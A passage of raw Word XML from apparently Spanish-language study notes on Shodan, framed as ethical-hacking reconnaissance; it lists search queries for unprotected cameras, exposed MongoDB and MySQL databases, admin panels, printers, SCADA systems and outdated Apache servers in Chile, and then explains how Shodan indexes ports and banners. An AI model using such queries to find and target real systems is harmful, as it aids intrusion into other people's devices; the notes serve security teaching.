    <w:p w14:paraId="78760FEB" w14:textId="77777777" w:rsidR="00A902FB" w:rsidRPr="00A902FB" w:rsidRDefault="00A902FB" w:rsidP="00A902FB">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A902FB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Búsquedas típica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902FB" w14:paraId="4EF30B7F" w14:textId="77777777" w:rsidTr="00A902FB">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10790" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6CB98B65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# Cámaras sin contraseña</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="252590F6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"default password"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2D36FD2B" w14:textId="77777777" w:rsidR="00A902FB" w:rsidRPr="00A902FB" w:rsidRDefault="00A902FB" w:rsidP="00A902FB">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="319B1F42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# Bases de datos MongoDB expuestas</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="270AE924" w14:textId="77777777" w:rsidR="00A902FB" w:rsidRPr="00B941CC" w:rsidRDefault="00A902FB" w:rsidP="00A902FB">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B941CC">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>"mongodb server information"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="689ECC76" w14:textId="77777777" w:rsidR="00A902FB" w:rsidRPr="00B941CC" w:rsidRDefault="00A902FB" w:rsidP="00A902FB">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="2F16C886" w14:textId="77777777" w:rsidR="00A902FB" w:rsidRPr="00B941CC" w:rsidRDefault="00A902FB" w:rsidP="00A902FB">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B941CC">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t># Paneles administrativos</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1817879C" w14:textId="77777777" w:rsidR="00A902FB" w:rsidRPr="00B941CC" w:rsidRDefault="00A902FB" w:rsidP="00A902FB">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B941CC">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>"admin panel"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="59BA37B9" w14:textId="77777777" w:rsidR="00A902FB" w:rsidRPr="00B941CC" w:rsidRDefault="00A902FB" w:rsidP="00A902FB">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="57F89C0E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# Impresoras de red</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7787BBD8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"HP LaserJet"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2D3E49DA" w14:textId="77777777" w:rsidR="00A902FB" w:rsidRPr="00A902FB" w:rsidRDefault="00A902FB" w:rsidP="00A902FB">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="49A3F7C0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# Sistemas industriales</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="67269A1C" w14:textId="32646C7F" w:rsid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"SCADA"</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2623A91C" w14:textId="77777777" w:rsidR="00A902FB" w:rsidRDefault="00A902FB" w:rsidP="00960D31">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E9DC4CB" w14:textId="77777777" w:rsidR="00A902FB" w:rsidRPr="00A902FB" w:rsidRDefault="00A902FB" w:rsidP="00A902FB">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A902FB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Uso en hacking ético:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="029B1D8E" w14:textId="77777777" w:rsidR="00A902FB" w:rsidRPr="00A902FB" w:rsidRDefault="00A902FB" w:rsidP="00A902FB">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A902FB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Reconocimiento pasiv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902FB" w14:paraId="6928A467" w14:textId="77777777" w:rsidTr="00A902FB">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10790" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5F059B10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org:"Empresa Objetivo"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="388F3673" w14:textId="751A911F" w:rsid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rFonts w:hint="eastAsia"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>→</w:t>
            </w:r>
            <w:r w:rsidRPr="00A902FB">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t xml:space="preserve"> Todos los dispositivos de esa organización</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="66F091E8" w14:textId="77777777" w:rsidR="00A902FB" w:rsidRDefault="00A902FB" w:rsidP="00960D31">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3BB06CD0" w14:textId="77777777" w:rsidR="00A902FB" w:rsidRPr="00A902FB" w:rsidRDefault="00A902FB" w:rsidP="00A902FB">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A902FB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Encontrar servicios vulnerabl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902FB" w14:paraId="2C88E789" w14:textId="77777777" w:rsidTr="00A902FB">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10790" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="11F58913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apache 2.2.15 country:CL</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F495D31" w14:textId="13984804" w:rsid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rFonts w:hint="eastAsia"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>→</w:t>
            </w:r>
            <w:r w:rsidRPr="00A902FB">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t xml:space="preserve"> Servidores Apache viejos en Chile</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="72EF1E1D" w14:textId="77777777" w:rsidR="00A902FB" w:rsidRDefault="00A902FB" w:rsidP="00960D31">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="32522355" w14:textId="77777777" w:rsidR="00A902FB" w:rsidRPr="00A902FB" w:rsidRDefault="00A902FB" w:rsidP="00A902FB">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A902FB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Descubrir infra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902FB" w14:paraId="6B7B65A5" w14:textId="77777777" w:rsidTr="00A902FB">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10790" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3BA4EEDF" w14:textId="77777777" w:rsidR="00A902FB" w:rsidRP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sz w:val="24"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>port:3306 mysql</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1E8EE888" w14:textId="416CBE86" w:rsidR="00A902FB" w:rsidRDefault="00A902FB" w:rsidP="00A902FB">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A902FB">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>→</w:t>
            </w:r>
            <w:r w:rsidRPr="00A902FB">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t xml:space="preserve"> Bases de datos MySQL expuestas</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7AD1AE63" w14:textId="77777777" w:rsidR="00A902FB" w:rsidRDefault="00A902FB" w:rsidP="00960D31">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3673E5E3" w14:textId="3161AF74" w:rsidR="00A3367A" w:rsidRDefault="00A3367A" w:rsidP="00960D31">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A3367A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>En resumen:</w:t>
      </w:r>
      <w:r w:rsidRPr="00A3367A">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Shodan escanea Internet continuamente y cataloga todos los dispositivos conectados, mostrando qué está expuesto, dónde y con qué vulnerabilidades.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CD422ED" w14:textId="7039659E" w:rsidR="00800CFE" w:rsidRPr="00800CFE" w:rsidRDefault="00800CFE" w:rsidP="00960D31">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00800CFE">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Repositorio que agrupa muchas c</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>onsultas:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00800CFE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>https://github.com/jakejarvis/awesome-shodan-queries</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5481637F" w14:textId="49A54451" w:rsidR="00800CFE" w:rsidRDefault="00800CFE" w:rsidP="00960D31">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00800CFE">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>“Server: yawcam” “Mime-Type: text/html”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4330AA14" w14:textId="77777777" w:rsidR="00417BB5" w:rsidRDefault="00417BB5" w:rsidP="00960D31">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A7637A4" w14:textId="77777777" w:rsidR="003E6EE8" w:rsidRDefault="003E6EE8" w:rsidP="00960D31">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D7A9517" w14:textId="77777777" w:rsidR="003E6EE8" w:rsidRDefault="003E6EE8" w:rsidP="00960D31">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="003972DB" w14:textId="77777777" w:rsidR="003E6EE8" w:rsidRDefault="003E6EE8" w:rsidP="00960D31">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6223CC39" w14:textId="1FAA26D7" w:rsidR="003E6EE8" w:rsidRPr="00416FE9" w:rsidRDefault="003E6EE8" w:rsidP="003E6EE8">
      <w:pPr>
        <w:pStyle w:val="Ttulo4"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00416FE9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">2.1.4.1 </w:t>
      </w:r>
      <w:r w:rsidR="00227B87" w:rsidRPr="00416FE9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>¿Que es SHODAN?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DB1F8A3" w14:textId="461974F1" w:rsidR="00417BB5" w:rsidRDefault="00C41220" w:rsidP="00C41220">
      <w:r w:rsidRPr="00C41220">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Shodan</w:t>
      </w:r>
      <w:r w:rsidRPr="00C41220">
        <w:t xml:space="preserve"> es un </w:t>
      </w:r>
      <w:r w:rsidRPr="00C41220">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>motor de búsqueda</w:t>
      </w:r>
      <w:r w:rsidRPr="00C41220">
        <w:t xml:space="preserve"> creado en 2009 por John Matherly</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> que escanea </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">TODO Internet </w:t>
      </w:r>
      <w:r>
        <w:t>buscando dispositivos conectados.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FC84D2B" w14:textId="62BEBC49" w:rsidR="00C41220" w:rsidRDefault="00C41220" w:rsidP="00C41220">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Diferencia fundam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1220" w14:paraId="54EFA6BC" w14:textId="77777777" w:rsidTr="00C41220">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10790" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1CB488C5" w14:textId="44D19B9F" w:rsidR="00C41220" w:rsidRPr="00C41220" w:rsidRDefault="00C41220" w:rsidP="00C41220">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C41220">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Google</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C41220" w14:paraId="0AFB8D34" w14:textId="77777777" w:rsidTr="00C41220">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10790" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="281FED7C" w14:textId="77777777" w:rsidR="00C41220" w:rsidRPr="00C41220" w:rsidRDefault="00C41220" w:rsidP="00C41220">
            <w:r w:rsidRPr="00C41220">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Busca: </w:t>
            </w:r>
            <w:r w:rsidRPr="00C41220">
              <w:t>Paginas web</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="58E6A730" w14:textId="77777777" w:rsidR="00C41220" w:rsidRPr="00C41220" w:rsidRDefault="00C41220" w:rsidP="00C41220">
            <w:r w:rsidRPr="00C41220">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Indexa: </w:t>
            </w:r>
            <w:r w:rsidRPr="00C41220">
              <w:t>Contenido HTML</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="08DC6AD8" w14:textId="1BF411AE" w:rsidR="00C41220" w:rsidRPr="00C41220" w:rsidRDefault="00C41220" w:rsidP="00C41220">
            <w:r w:rsidRPr="00C41220">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Encuentra: </w:t>
            </w:r>
            <w:r w:rsidR="000B1D1F" w:rsidRPr="00C41220">
              <w:t>Información</w:t>
            </w:r>
            <w:r w:rsidRPr="00C41220">
              <w:t xml:space="preserve"> para humanos</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="173D199D" w14:textId="77777777" w:rsidR="00C41220" w:rsidRDefault="00C41220" w:rsidP="00C41220">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs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27D5" w14:paraId="2E2B70F0" w14:textId="77777777" w:rsidTr="008627D5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10790" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="00C2044B" w14:textId="5DA364B3" w:rsidR="008627D5" w:rsidRPr="000B1D1F" w:rsidRDefault="008627D5" w:rsidP="00C41220">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="000B1D1F">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Shodan</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008627D5" w14:paraId="191FAECF" w14:textId="77777777" w:rsidTr="008627D5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10790" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="475ED15E" w14:textId="77777777" w:rsidR="008627D5" w:rsidRPr="000B1D1F" w:rsidRDefault="008627D5" w:rsidP="00C41220">
            <w:r w:rsidRPr="000B1D1F">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Busca: </w:t>
            </w:r>
            <w:r w:rsidRPr="000B1D1F">
              <w:t>Dispositivos conectados</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="70E7D17F" w14:textId="77777777" w:rsidR="008627D5" w:rsidRPr="000B1D1F" w:rsidRDefault="008627D5" w:rsidP="00C41220">
            <w:r w:rsidRPr="000B1D1F">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Indexa: </w:t>
            </w:r>
            <w:r w:rsidRPr="000B1D1F">
              <w:t>Puertos, servicios, banners</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="539869CD" w14:textId="434EEE1A" w:rsidR="000B1D1F" w:rsidRPr="000B1D1F" w:rsidRDefault="000B1D1F" w:rsidP="00C41220">
            <w:r w:rsidRPr="000B1D1F">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Encuentra: </w:t>
            </w:r>
            <w:r w:rsidRPr="000B1D1F">
              <w:t>Maquinas y sus vulnerabilidades</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="44E4DCC2" w14:textId="3B9A7573" w:rsidR="006B7A78" w:rsidRDefault="006B7A78" w:rsidP="00C41220">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="65D3C2D3" w14:textId="4E488B79" w:rsidR="009C4E8F" w:rsidRDefault="009C4E8F" w:rsidP="00C41220">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Otra definición:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Shodan </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">NO solo busca IoT, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">busca </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">CUALQUIER COSA </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>que 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4E8F" w14:paraId="5A70131E" w14:textId="77777777" w:rsidTr="009C4E8F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10790" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1F00EAAD" w14:textId="77777777" w:rsidR="009C4E8F" w:rsidRDefault="009C4E8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rvidores web (Apache, ngix)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6ED18107" w14:textId="77777777" w:rsidR="009C4E8F" w:rsidRDefault="009C4E8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e de datos (MySQL, MongoDB)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="198C2D5F" w14:textId="77777777" w:rsidR="009C4E8F" w:rsidRDefault="009C4E8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positivos Iot (cámaras, routers)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D6DA8EE" w14:textId="77777777" w:rsidR="009C4E8F" w:rsidRDefault="009C4E8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rvicios SSH, FTP, Telnet</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5295149F" w14:textId="77777777" w:rsidR="009C4E8F" w:rsidRDefault="009C4E8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neles administrativos</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0110890E" w14:textId="77777777" w:rsidR="009C4E8F" w:rsidRDefault="009C4E8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presoras de red</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2D5CC14B" w14:textId="2401D4A3" w:rsidR="009C4E8F" w:rsidRPr="009C4E8F" w:rsidRDefault="009C4E8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stemas industriales (SCADA)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0DA21BEF" w14:textId="77777777" w:rsidR="009C4E8F" w:rsidRDefault="009C4E8F" w:rsidP="009C4E8F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="14BE5C97" w14:textId="33CE5510" w:rsidR="009C4E8F" w:rsidRPr="009C4E8F" w:rsidRDefault="009C4E8F" w:rsidP="009C4E8F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009C4E8F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>PROCESO EXA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4E8F" w:rsidRPr="00D53D3A" w14:paraId="31B79A17" w14:textId="77777777" w:rsidTr="009C4E8F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10790" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="70346F21" w14:textId="26984172" w:rsidR="009C4E8F" w:rsidRPr="009C4E8F" w:rsidRDefault="009C4E8F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9C4E8F">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Shodan escanea IP: 200.1.1.50</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5284DFE4" w14:textId="77777777" w:rsidR="00D53D3A" w:rsidRDefault="009C4E8F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9C4E8F">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t xml:space="preserve">Prueba puertos comunes: </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="387B8BCC" w14:textId="77777777" w:rsidR="00D53D3A" w:rsidRDefault="009C4E8F" w:rsidP="00D53D3A">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009C4E8F">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t xml:space="preserve">- Puerto 22 → responde SSH </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2C4DA26C" w14:textId="77777777" w:rsidR="00D53D3A" w:rsidRDefault="009C4E8F" w:rsidP="00D53D3A">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009C4E8F">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t xml:space="preserve">- Puerto 80 → responde Apache </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2515F268" w14:textId="76AED5D1" w:rsidR="00D53D3A" w:rsidRDefault="009C4E8F" w:rsidP="00D53D3A">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009C4E8F">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>- Puerto 3306 → responde MySQL</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="375E512B" w14:textId="77777777" w:rsidR="00D53D3A" w:rsidRDefault="00D53D3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8"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D53D3A">
              <w:rPr>
                <w:sz w:val="24"/>
